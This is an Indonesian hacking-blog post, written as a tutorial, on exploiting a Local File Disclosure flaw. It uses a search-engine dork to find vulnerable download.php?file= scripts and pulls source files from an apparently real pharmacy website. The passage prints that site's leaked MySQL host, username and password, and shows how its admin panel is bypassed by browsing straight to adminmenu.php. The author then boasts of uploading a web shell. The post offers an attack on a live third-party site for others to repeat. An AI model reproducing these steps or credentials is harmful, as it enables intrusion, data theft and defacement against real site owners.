AnoN Chat
--=[ ANON POST ]=--
--=[ DATE ]=--
exploit Bug LFD | profesor aka ZGoM91
Label:
Hacker,
Hacking Tutorial
Asalamualaiku wr wb. . . Hai berjumpa dgn saya siganteng tiada taran & tampan sejagat raya r(^_^)r . . . kali ini saya ingin berbagi sedikit SESUATU tentang teknik yg di sebut Local File Disclosure/Download(LFD),nah sebelum kita mulai masbrow harus tau apa sih bug local file disclosure,hehehe walau saya belum tau benar tp saya ingin sok tau. LFD kurang lebh adalah celah Vulnerabiliy yg di sebabkan krna kesalah Code sehingga sang attacker bisa mendownload file2 sensitif seperti config.php yg ada di dlm suatu server, hehehe langsung aja deh keburu ngantuk. . r(^_^)r
=================
Step 1
=================
Langsng masukan dork= inurl:download.php?file= dan tara buanyak . . .
Lalu saya coba satu persatu dan saya nemu situs yg mempunyai kelemahan bug (LFD)
http://pharmacos.in/download.php?file=sempak.pdflalu saya ganti url belakang sempak.pdf dengan download.php jd gini
http://pharmacos.in/download.php?file=download.Phpdan langsng saya download source dari download.php untuk mengetahui kenapa bisa tercipta Bug (LFD)
<?phpheader('Content-type: application/octet-stream');header('Content-Length: ' . filesize($_REQUEST['file']));header('Content-Disposition: attachment; filename="'.basename($_REQUEST['file']).'"');readfile($_REQUEST['file']);?>nah dr kode tersbt si webmaster tdk memvalidasi shingga sang attcker bisa download file2 gntng..
=================
Step 2
=================
Setelah saya coba cari login admin panel akhirnya ketemu jga example :
http://sempak.in/admin/index.phplangsung gpl tak dunlud source'n http://sempak.in/download.php?file=admin/index.php sukses 100% dan tara include_once("../connection.php"); sebenarnya mash ada lg yg ingin saya tunjukan tp sblm'na saya penasaran ama ../connection.php lngsung
http://sempak.in/download.php?file=connection.phpsuskses bongkar
<?php /*$con=mysql_connect("localhost","root","");mysql_select_db("pharmacos",$con);*/$con=mysql_connect("67.228.4.124:3306","viraljain0","MERCURY");mysql_select_db("pharmacos",$con);?>wew ternyata isinya data login mysql yes. . lanjut. . .
=================
Step 3
=================
Eeettt hampir lupa tadi Q Blm selsai bongkar /admin/index.php sapa tau ada petunjuk yg lbh penting:D
session_start();$username=$_POST['username'];$password=$_POST['password'];$log=mysql_query("select * from admin_login where admin_name='$username' AND admin_password='$password'");$numsel=mysql_num_rows($log);if($numsel==1){$_SESSION['aname']=$username;?><script>location.href="adminmenu.php";</script><?php }else{?><script>alert("Please Insert Correct Information");location.href="#";</script><?php }dan benar brow isinya sesuatu perhatikn seksama
[red]$numsel=mysql_num_rows($log);if($numsel==1){$_SESSION['aname']=$username; ?><script>location.href="adminmenu.phpnah logikanya gini kita di suruh login dan data login di sambung ke mysql, jika memang data login benar di mysql maka kita akan di kirim ke http://sempak.in/admin/adminmenu.php tp kayake ada yg janggal ngapain kita login2 segala mendng lngsng aja http://sempak.in/admin/adminmenu.php wew. . Hehehe sukses masbrow MANCING MANIA MANTAP . . . ! Langsung deh si ganteng tiada tara masuk admin panel'e trs upload shell image,hehehe Josss. . . !
by me (profesor aka ZGoM91)
Diposting oleh AnoN|03 di 23.24
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar